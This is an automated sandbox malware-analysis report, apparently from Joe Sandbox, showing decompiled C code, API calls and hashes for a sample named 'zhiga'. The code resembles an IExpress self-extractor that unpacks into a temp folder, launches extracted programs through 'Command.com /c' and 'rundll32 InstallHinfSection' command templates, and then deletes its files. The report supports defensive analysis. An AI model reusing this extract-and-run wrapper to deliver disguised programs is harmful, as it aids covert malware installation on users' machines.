                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                          • API String ID: 1032054927-520995012
                                                          • Opcode ID: 928438a335adb94c5b4f0adf845605f7a3830888952500c76b0f2b1e4d92f22d
                                                          • Instruction ID: 8882e38562ba6b0442406df992e850cd2fbe2a13ae9b500486c4c47e5ebc8905
                                                          • Opcode Fuzzy Hash: 928438a335adb94c5b4f0adf845605f7a3830888952500c76b0f2b1e4d92f22d
                                                          • Instruction Fuzzy Hash: DDB1E4B06083019BEF70AF38947576B7AE4FB84714F00495DFAD5DA290D7798800EF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          [Figure: control-flow graph of function 01091AE8; legend: Executed / Not Executed]
                                                          C-Code - Quality: 82%
                                                          			E01091AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v527;
                                                          				char _v528;
                                                          				char _v1552;
                                                          				CHAR* _v1556;
                                                          				int* _v1560;
                                                          				CHAR** _v1564;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t48;
                                                          				CHAR* _t53;
                                                          				CHAR* _t54;
                                                          				char* _t57;
                                                          				char* _t58;
                                                          				CHAR* _t60;
                                                          				void* _t62;
                                                          				signed char _t65;
                                                          				intOrPtr _t76;
                                                          				intOrPtr _t77;
                                                          				unsigned int _t85;
                                                          				CHAR* _t90;
                                                          				CHAR* _t92;
                                                          				char _t105;
                                                          				char _t106;
                                                          				CHAR** _t111;
                                                          				CHAR* _t115;
                                                          				intOrPtr* _t125;
                                                          				void* _t126;
                                                          				CHAR* _t132;
                                                          				CHAR* _t135;
                                                          				void* _t138;
                                                          				void* _t139;
                                                          				void* _t145;
                                                          				intOrPtr* _t146;
                                                          				char* _t148;
                                                          				CHAR* _t151;
                                                          				void* _t152;
                                                          				CHAR* _t155;
                                                          				CHAR* _t156;
                                                          				void* _t157;
                                                          				signed int _t158;
                                                          
                                                          				_t48 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t48 ^ _t158;
                                                          				_t108 = __ecx;
                                                          				_v1564 = _a4;
                                                          				_v1560 = _a8;
                                                          				E01091680( &_v528, 0x104, __ecx);
                                                          				if(_v528 != 0x22) {
                                                          					_t135 = " ";
                                                          					_t53 =  &_v528;
                                                          				} else {
                                                          					_t135 = "\"";
                                                          					_t53 =  &_v527;
                                                          				}
                                                          				_t111 =  &_v1556;
                                                          				_v1556 = _t53;
                                                          				_t54 = E01091A84(_t111, _t135);
                                                          				_t156 = _v1556;
                                                          				_t151 = _t54;
                                                          				if(_t156 == 0) {
                                                          					L12:
                                                          					_push(_t111);
                                                          					E01091781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          					E0109658A( &_v268, 0x104, _t156);
                                                          					goto L13;
                                                          				} else {
                                                          					_t132 = _t156;
                                                          					_t148 =  &(_t132[1]);
                                                          					do {
                                                          						_t105 =  *_t132;
                                                          						_t132 =  &(_t132[1]);
                                                          					} while (_t105 != 0);
                                                          					_t111 = _t132 - _t148;
                                                          					if(_t111 < 3) {
                                                          						goto L12;
                                                          					}
                                                          					_t106 = _t156[1];
                                                          					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                          						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                          							goto L12;
                                                          						} else {
                                                          							goto L11;
                                                          						}
                                                          					} else {
                                                          						L11:
                                                          						E01091680( &_v268, 0x104, _t156);
                                                          						L13:
                                                          						_t138 = 0x2e;
                                                          						_t57 = E010966C8(_t156, _t138);
                                                          						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                          							_t139 = 0x2e;
                                                          							_t115 = _t156;
                                                          							_t58 = E010966C8(_t115, _t139);
                                                          							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                          								_t156 = LocalAlloc(0x40, 0x400);
                                                          								if(_t156 == 0) {
                                                          									goto L43;
                                                          								}
                                                          								_t65 = GetFileAttributesA( &_v268); // executed
                                                          								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                          									E01091680( &_v1552, 0x400, _t108);
                                                          								} else {
                                                          									_push(_t115);
                                                          									_t108 = 0x400;
                                                          									E01091781( &_v1552, 0x400, _t115,  &_v268);
                                                          									if(_t151 != 0 &&  *_t151 != 0) {
                                                          										E010916B3( &_v1552, 0x400, " ");
                                                          										E010916B3( &_v1552, 0x400, _t151);
                                                          									}
                                                          								}
                                                          								_t140 = _t156;
                                                          								 *_t156 = 0;
                                                          								E01092AAC( &_v1552, _t156, _t156);
                                                          								goto L53;
                                                          							} else {
                                                          								_t108 = "Command.com /c %s";
                                                          								_t125 = "Command.com /c %s";
                                                          								_t145 = _t125 + 1;
                                                          								do {
                                                          									_t76 =  *_t125;
                                                          									_t125 = _t125 + 1;
                                                          								} while (_t76 != 0);
                                                          								_t126 = _t125 - _t145;
                                                          								_t146 =  &_v268;
                                                          								_t157 = _t146 + 1;
                                                          								do {
                                                          									_t77 =  *_t146;
                                                          									_t146 = _t146 + 1;
                                                          								} while (_t77 != 0);
                                                          								_t140 = _t146 - _t157;
                                                          								_t154 = _t126 + 8 + _t146 - _t157;
                                                          								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                          								if(_t156 != 0) {
                                                          									E0109171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                          									goto L53;
                                                          								}
                                                          								goto L43;
                                                          							}
                                                          						} else {
                                                          							_t85 = GetFileAttributesA( &_v268);
                                                          							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                          								_t140 = 0x525;
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_t60 =  &_v268;
                                                          								goto L35;
                                                          							} else {
                                                          								_t140 = "[";
                                                          								_v1556 = _t151;
                                                          								_t90 = E01091A84( &_v1556, "[");
                                                          								if(_t90 != 0) {
                                                          									if( *_t90 != 0) {
                                                          										_v1556 = _t90;
                                                          									}
                                                          									_t140 = "]";
                                                          									E01091A84( &_v1556, "]");
                                                          								}
                                                          								_t156 = LocalAlloc(0x40, 0x200);
                                                          								if(_t156 == 0) {
                                                          									L43:
                                                          									_t60 = 0;
                                                          									_t140 = 0x4b5;
                                                          									_push(0);
                                                          									_push(0x10);
                                                          									_push(0);
                                                          									L35:
                                                          									_push(_t60);
                                                          									E010944B9(0, _t140);
                                                          									_t62 = 0;
                                                          									goto L54;
                                                          								} else {
                                                          									_t155 = _v1556;
                                                          									_t92 = _t155;
                                                          									if( *_t155 == 0) {
                                                          										_t92 = "DefaultInstall";
                                                          									}
                                                          									 *0x1099120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                          									 *_v1560 = 1;
                                                          									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1091140, _t156, 8,  &_v268) == 0) {
                                                          										 *0x1099a34 =  *0x1099a34 & 0xfffffffb;
                                                          										if( *0x1099a40 != 0) {
                                                          											_t108 = "setupapi.dll";
                                                          										} else {
                                                          											_t108 = "setupx.dll";
                                                          											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                          										}
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										_push( &_v268);
                                                          										_push(_t155);
                                                          										E0109171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                          									} else {
                                                          										 *0x1099a34 =  *0x1099a34 | 0x00000004;
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										E01091680(_t108, 0x104, _t155);
                                                          										_t140 = 0x200;
                                                          										E01091680(_t156, 0x200,  &_v268);
                                                          									}
                                                          									L53:
                                                          									_t62 = 1;
                                                          									 *_v1564 = _t156;
                                                          									L54:
                                                          									_pop(_t152);
                                                          									return E01096CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}


                                                          APIs
                                                          • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01091BE7
                                                          • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01091BFE
                                                          • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 01091C57
                                                          • GetPrivateProfileIntA.KERNEL32 ref: 01091C88
                                                          • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,01091140,00000000,00000008,?), ref: 01091CB8
                                                          • GetShortPathNameA.KERNEL32 ref: 01091D1B
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                          • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                          • API String ID: 383838535-2869639027
                                                          • Opcode ID: 31a1495d453c88f823dd1052db4722443735e7034d927fea75c94bd974d3278c
                                                          • Instruction ID: 93f18bef850c0bd014b17b6ffa77520aea88c79e9fc20a9ec90df018fdfd5c87
                                                          • Opcode Fuzzy Hash: 31a1495d453c88f823dd1052db4722443735e7034d927fea75c94bd974d3278c
                                                          • Instruction Fuzzy Hash: 4AA16EB0B0020B6BEF61AB28CC74BEA77A9AB55330F1442D9E5D5A32C0DB758D85DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 406 1092f1d-1092f3d 407 1092f6c-1092f73 call 1095164 406->407 408 1092f3f-1092f46 406->408 416 1092f79-1092f80 call 10955a0 407->416 417 1093041 407->417 410 1092f48 call 10951e5 408->410 411 1092f5f-1092f66 call 1093a3f 408->411 418 1092f4d-1092f4f 410->418 411->407 411->417 416->417 424 1092f86-1092fbe GetSystemDirectoryA call 109658a LoadLibraryA 416->424 420 1093043-1093053 call 1096ce0 417->420 418->417 421 1092f55-1092f5d 418->421 421->407 421->411 428 1092fc0-1092fd4 GetProcAddress 424->428 429 1092ff7-1093004 FreeLibrary 424->429 428->429 432 1092fd6-1092fee DecryptFileA 428->432 430 1093017-1093024 SetCurrentDirectoryA 429->430 431 1093006-109300c 429->431 434 1093054-109305a 430->434 435 1093026-109303c call 10944b9 call 1096285 430->435 431->430 433 109300e call 109621e 431->433 432->429 441 1092ff0-1092ff5 432->441 445 1093013-1093015 433->445 436 109305c call 1093b26 434->436 437 1093065-109306c 434->437 435->417 447 1093061-1093063 436->447 443 109307c-1093089 437->443 444 109306e-1093075 call 109256d 437->444 441->429 449 109308b-1093091 443->449 450 10930a1-10930a9 443->450 452 109307a 444->452 445->417 445->430 447->417 447->437 449->450 453 1093093 call 1093ba2 449->453 455 10930ab-10930ad 450->455 456 10930b4-10930b7 450->456 452->443 460 1093098-109309a 453->460 455->456 457 10930af call 1094169 455->457 456->420 457->456 460->417 461 109309c 460->461 461->450
                                                          C-Code - Quality: 82%
                                                          			E01092F1D(void* __ecx, int __edx) {
                                                          				signed int _v8;
                                                          				char _v272;
                                                          				_Unknown_base(*)()* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t9;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				void* _t14;
                                                          				int _t21;
                                                          				signed int _t22;
                                                          				signed int _t25;
                                                          				intOrPtr* _t26;
                                                          				signed int _t27;
                                                          				void* _t30;
                                                          				_Unknown_base(*)()* _t31;
                                                          				void* _t34;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr _t41;
                                                          				intOrPtr* _t44;
                                                          				signed int _t46;
                                                          				int _t47;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          
                                                          				_t43 = __edx;
                                                          				_t9 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t9 ^ _t46;
                                                          				if( *0x1098a38 != 0) {
                                                          					L5:
                                                          					_t11 = E01095164(_t52);
                                                          					_t53 = _t11;
                                                          					if(_t11 == 0) {
                                                          						L16:
                                                          						_t12 = 0;
                                                          						L17:
                                                          						return E01096CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                          					}
                                                          					_t14 = E010955A0(_t53); // executed
                                                          					if(_t14 == 0) {
                                                          						goto L16;
                                                          					} else {
                                                          						_t45 = 0x105;
                                                          						GetSystemDirectoryA( &_v272, 0x105);
                                                          						_t43 = 0x105;
                                                          						_t40 =  &_v272;
                                                          						E0109658A( &_v272, 0x105, "advapi32.dll");
                                                          						_t36 = LoadLibraryA( &_v272);
                                                          						_t44 = 0;
                                                          						if(_t36 != 0) {
                                                          							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                          							_v276 = _t31;
                                                          							if(_t31 != 0) {
                                                          								_t45 = _t47;
                                                          								_t40 = _t31;
                                                          								 *0x109a288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                          								_v276();
                                                          								if(_t47 != _t47) {
                                                          									_t40 = 4;
                                                          									asm("int 0x29");
                                                          								}
                                                          							}
                                                          						}
                                                          						FreeLibrary(_t36);
                                                          						_t58 =  *0x1098a24 - _t44; // 0x0
                                                          						if(_t58 != 0) {
                                                          							L14:
                                                          							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                          							if(_t21 != 0) {
                                                          								__eflags =  *0x1098a2c - _t44; // 0x0
                                                          								if(__eflags != 0) {
                                                          									L20:
                                                          									__eflags =  *0x1098d48 & 0x000000c0;
                                                          									if(( *0x1098d48 & 0x000000c0) == 0) {
                                                          										_t41 =  *0x1099a40; // 0x3, executed
                                                          										_t26 = E0109256D(_t41); // executed
                                                          										_t44 = _t26;
                                                          									}
                                                          									_t22 =  *0x1098a24; // 0x0
                                                          									 *0x1099a44 = _t44;
                                                          									__eflags = _t22;
                                                          									if(_t22 != 0) {
                                                          										L26:
                                                          										__eflags =  *0x1098a38;
                                                          										if( *0x1098a38 == 0) {
                                                          											__eflags = _t22;
                                                          											if(__eflags == 0) {
                                                          												E01094169(__eflags);
                                                          											}
                                                          										}
                                                          										_t12 = 1;
                                                          										goto L17;
                                                          									} else {
                                                          										__eflags =  *0x1099a30 - _t22; // 0x0
                                                          										if(__eflags != 0) {
                                                          											goto L26;
                                                          										}
                                                          										_t25 = E01093BA2(); // executed
                                                          										__eflags = _t25;
                                                          										if(_t25 == 0) {
                                                          											goto L16;
                                                          										}
                                                          										_t22 =  *0x1098a24; // 0x0
                                                          										goto L26;
                                                          									}
                                                          								}
                                                          								_t27 = E01093B26(_t40, _t44);
                                                          								__eflags = _t27;
                                                          								if(_t27 == 0) {
                                                          									goto L16;
                                                          								}
                                                          								goto L20;
                                                          							}
                                                          							_t43 = 0x4bc;
                                                          							E010944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                          							 *0x1099124 = E01096285();
                                                          							goto L16;
                                                          						}
                                                          						_t59 =  *0x1099a30 - _t44; // 0x0
                                                          						if(_t59 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						_t30 = E0109621E(); // executed
                                                          						if(_t30 == 0) {
                                                          							goto L16;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				_t49 =  *0x1098a24;
                                                          				if( *0x1098a24 != 0) {
                                                          					L4:
                                                          					_t34 = E01093A3F(_t51);
                                                          					_t52 = _t34;
                                                          					if(_t34 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          				if(E010951E5(_t49) == 0) {
                                                          					goto L16;
                                                          				}
                                                          				_t51 =  *0x1098a38;
                                                          				if( *0x1098a38 != 0) {
                                                          					goto L5;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 01092F93
                                                          • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 01092FB2
                                                          • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01092FC6
                                                          • DecryptFileA.ADVAPI32 ref: 01092FE6
                                                          • FreeLibrary.KERNEL32(00000000), ref: 01092FF8
                                                          • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0109301C
                                                            • Part of subcall function 010951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01092F4D,?,00000002,00000000), ref: 01095201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                          • API String ID: 2126469477-1274120739
                                                          • Opcode ID: 47f987bfd8271eaadfb840f0126b9e451a1c88e81ddcd889653f835347872f6b
                                                          • Instruction ID: 18aed90339131e12a786073032ce717d1f423bea3772f2d7ffb9fafd21c47746
                                                          • Opcode Fuzzy Hash: 47f987bfd8271eaadfb840f0126b9e451a1c88e81ddcd889653f835347872f6b
                                                          • Instruction Fuzzy Hash: EA41ED30A002059AEF71AB799D786AA37E8FB85754F0041AAFAC1C6155EB7EC580EF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E01092390(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v276;
                                                          				char _v280;
                                                          				char _v284;
                                                          				struct _WIN32_FIND_DATAA _v596;
                                                          				struct _WIN32_FIND_DATAA _v604;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				int _t36;
                                                          				void* _t46;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				CHAR* _t65;
                                                          				void* _t66;
                                                          				signed int _t67;
                                                          				signed int _t69;
                                                          
                                                          				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                          				_t21 =  *0x1098004; // 0x8a9c601
                                                          				_t22 = _t21 ^ _t69;
                                                          				_v8 = _t21 ^ _t69;
                                                          				_t65 = __ecx;
                                                          				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                          					L10:
                                                          					_pop(_t62);
                                                          					_pop(_t66);
                                                          					_pop(_t46);
                                                          					return E01096CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                          				} else {
                                                          					E01091680( &_v276, 0x104, __ecx);
                                                          					_t58 = 0x104;
                                                          					E010916B3( &_v280, 0x104, "*");
                                                          					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                          					_t63 = _t22;
                                                          					if(_t63 == 0xffffffff) {
                                                          						goto L10;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          					do {
                                                          						L3:
                                                          						_t58 = 0x104;
                                                          						E01091680( &_v276, 0x104, _t65);
                                                          						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                          							_t58 = 0x104;
                                                          							E010916B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                          							SetFileAttributesA( &_v280, 0x80);
                                                          							DeleteFileA( &_v280);
                                                          						} else {
                                                          							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                          								E010916B3( &_v276, 0x104,  &(_v596.cFileName));
                                                          								_t58 = 0x104;
                                                          								E0109658A( &_v280, 0x104, 0x1091140);
                                                          								E01092390( &_v284);
                                                          							}
                                                          						}
                                                          						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                          					} while (_t36 != 0);
                                                          					FindClose(_t63); // executed
                                                          					_t22 = RemoveDirectoryA(_t65); // executed
                                                          					goto L10;
                                                          				}
                                                          			}

                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(?,01098A3A,010911F4,01098A3A,00000000,?,?), ref: 010923F6
                                                          • lstrcmpA.KERNEL32(?,010911F8), ref: 01092427
                                                          • lstrcmpA.KERNEL32(?,010911FC), ref: 0109243B
                                                          • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 01092495
                                                          • DeleteFileA.KERNEL32(?), ref: 010924A3
                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010924AF
                                                          • FindClose.KERNELBASE(00000000), ref: 010924BE
                                                          • RemoveDirectoryA.KERNELBASE(01098A3A), ref: 010924C5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                          • String ID:
                                                          • API String ID: 836429354-0
                                                          • Opcode ID: 941eec77298e03acd90467eb9e8367e9d3f2435520f59fc466e0e3e7994ffcb9
                                                          • Instruction ID: 7584819bc9e9aada24f9b7b9b7742d5b1485a02d31a09df1fb879602f589b790
                                                          • Opcode Fuzzy Hash: 941eec77298e03acd90467eb9e8367e9d3f2435520f59fc466e0e3e7994ffcb9
                                                          • Instruction Fuzzy Hash: 4E31A371704741ABDB30DA64CC68AEB77ECBBC4311F04492EA5D587280EF3895099751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 70%
                                                          			E01092BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				long _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t7;
                                                          				void* _t9;
                                                          				struct HINSTANCE__* _t12;
                                                          				intOrPtr* _t17;
                                                          				signed char _t19;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          				void* _t24;
                                                          				intOrPtr _t32;
                                                          
                                                          				_t4 = GetVersion();
                                                          				if(_t4 >= 0 && _t4 >= 6) {
                                                          					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                          					if(_t12 != 0) {
                                                          						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                          						if(_t21 != 0) {
                                                          							_t17 = _t21;
                                                          							 *0x109a288(0, 1, 0, 0);
                                                          							 *_t21();
                                                          							_t29 = _t24 - _t24;
                                                          							if(_t24 != _t24) {
                                                          								_t17 = 4;
                                                          								asm("int 0x29");
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t20 = _a12;
                                                          				_t18 = _a4;
                                                          				 *0x1099124 = 0;
                                                          				if(E01092CAA(_a4, _a12, _t29, _t17) != 0) {
                                                          					_t9 = E01092F1D(_t18, _t20); // executed
                                                          					_t22 = _t9; // executed
                                                          					E010952B6(0, _t18, _t21, _t22); // executed
                                                          					if(_t22 != 0) {
                                                          						_t32 =  *0x1098a3a; // 0x0
                                                          						if(_t32 == 0) {
                                                          							_t19 =  *0x1099a2c; // 0x0
                                                          							if((_t19 & 0x00000001) != 0) {
                                                          								E01091F90(_t19, _t21, _t22);
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t6 =  *0x1098588; // 0x0
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x1099124; // 0x0
                                                          				return _t7;
                                                          			}


                                                          APIs
                                                          • GetVersion.KERNEL32(?,00000002,00000000,?,01096BB0,01090000,00000000,00000002,0000000A), ref: 01092C03
                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,?,01096BB0,01090000,00000000,00000002,0000000A), ref: 01092C18
                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 01092C28
                                                          • CloseHandle.KERNEL32(00000000,?,?,01096BB0,01090000,00000000,00000002,0000000A), ref: 01092C98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Handle$AddressCloseModuleProcVersion
                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                          • API String ID: 62482547-3460614246
                                                          • Opcode ID: 2e8dd372a5117c44ba33a820e651971753299bd8c77793b4f2977a749b5815be
                                                          • Instruction ID: f0dba682f947148e547e6ce498ee52a4127eea2457b1e9f9d416eeb7bfd7fa74
                                                          • Opcode Fuzzy Hash: 2e8dd372a5117c44ba33a820e651971753299bd8c77793b4f2977a749b5815be
                                                          • Instruction Fuzzy Hash: E511CDF130124DBBDF307BF9A874E5B3B99BB85394B040059FAC0D3244DA3AD841A754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01096F40() {
                                                          
                                                          				SetUnhandledExceptionFilter(E01096EF0); // executed
                                                          				return 0;
                                                          			}




                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 01096F45
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 0b5bac7735d769212f9305f6a7a479d9a83d13a7671607b75bb117d193ac75ae
                                                          • Instruction ID: 9302c88e2add9c811b70efc15228212e9c9341f31c69609542d22afe98c34166
